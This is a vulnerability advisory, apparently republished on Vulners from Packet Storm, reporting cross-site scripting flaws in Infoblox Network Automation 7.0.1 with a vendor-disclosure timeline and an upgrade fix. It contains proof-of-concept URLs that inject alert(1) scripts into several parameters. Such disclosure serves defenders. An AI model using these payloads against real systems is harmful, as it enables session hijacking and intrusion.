Lucene search
K

Infoblox 7.0.1 Cross Site Scripting

🗓️ 07 Sep 2016 00:00:00Reported by Alex HaynesType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 44 Views

Infoblox 7.0.1 Cross Site Scripting vulnerability in Network Automatio

Code
`Exploit Title: Infoblox Cross-site scripting vulnerabilities  
Product: Infoblox Network Automation  
Vulnerable Versions: 7.0.1 and all previous versions   
Tested Version: 6.9.2  
Advisory Publication: 06/09/2016  
Vulnerability Type: Cross-Site Scripting [CWE-79]  
CVE Reference: NONE  
Credit: Alex Haynes  
  
Advisory Details:  
  
  
(1) Vendor & Product Description  
--------------------------------  
  
Vendor:  
Infoblox  
  
Product & Version:  
Infoblox Network Automation v7.0.1  
  
Vendor URL & Download:  
https://www.infoblox.com/products/network-automation  
  
Product Description:  
"Infoblox also offers a complementary, powerful network automation platform which enables discovery, switch port management, network change configuration and compliance management for multi-vendor network devices. Automation cuts down administrator workload and reduces risk of network outages due to improper configurations or changes."  
  
(2) Vulnerability Details:  
--------------------------  
There are many cross-site scripting vulnerabilities present in netmri. Many parameters are vulnerable from the login page itself to other pages once the user is authenticated. Proof of concept examples below:  
  
_formstack variable vulnerable to XSS.  
  
https://NETMRISERVER/netmri/config/userAdmin/login.tdf?_formStack=%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E&mode=CHANGE-FORM&eulaAccepted=Accept&TrustToken=%0D&weakPassword=false&skipjackUsername=test&skipjackPassword=test&x=0&y=0  
  
skipjackPassword variable and skipjackUsername variable are also vulnerable in the same URL.  
  
DefaultTitle parameter is vulnerable in the URL below (this page is from after authentication):  
  
https://NETMRISERVER/netmri/config/index.tdf?defaultTitle=9ba35%3Cimg/src=x%20onerror=alert%281%29%3E%22%3Edf522&defaultMenu=Collection_and_Groups&defaultAccordion=Setup&defaultPage=/webui/settings/groups%3FuseTab%3Ddev  
  
The defaultAccordion, defaultMenu and defaultPage parameters are also vulnerable.  
  
In the help Section, the helpId parameter is vulnerable:  
  
https://NETMRISERVER/netmri/help/netmri_help/netmri_help.tdf?useContext=1&helpId=networkanalysis_issues_issuesbytype58626%27%3balert%281%29%2f%2f390  
  
  
  
  
(3) Advisory Timeline:  
----------------------  
25/01/2016 - First Contact informing vendor of vulnerabilities. No response.  
01/02/2016 - Follow up e-mail to inform them of vulnerabilities. Response requesting further information.  
01/02/2016 - Information on vulnerabilities sent to vendor. No response.  
08/02/2016 - follow up e-mail requesting update. Vendor responds asking us to open a support ticket.  
12/02/2016 - Infoblox products out of support so cannot raise ticket. write to vendor to explain situation. No response.  
24/02/2016 - Follow up with vendor on vulnerabilities requesting an update.  
10/03/2016 - Final follow up to vendor requesting an update. Vendor responds and opens support ticket for vulnerabilities, mentioning they will look into vulnerabilities.  
14/03/2016 - vendor responds saying they are able to reproduce vulnerabilities  
17/03/2016 - Vendor responds saying some of the vulnerabilities are already fixed in version 7.0.4 but cannot confirm which ones.  
05/04/2016 - Request update from vendor on status of vulnerabilities.  
12/04/2016 - Vendor responds saying CSRF already fixed in 7.0.1, XSS and HTTP Splitting to be fixed in upcoming 7.1.1 - expected release in summer.  
30/06/2016 - Patch 7.1.1 released  
06/09/2016 - Public disclosure  
  
  
(4)Solution:  
------------  
Upgrade to Version 7.1.1  
  
  
(5) Credits:  
------------  
Discovered by Alex Haynes  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation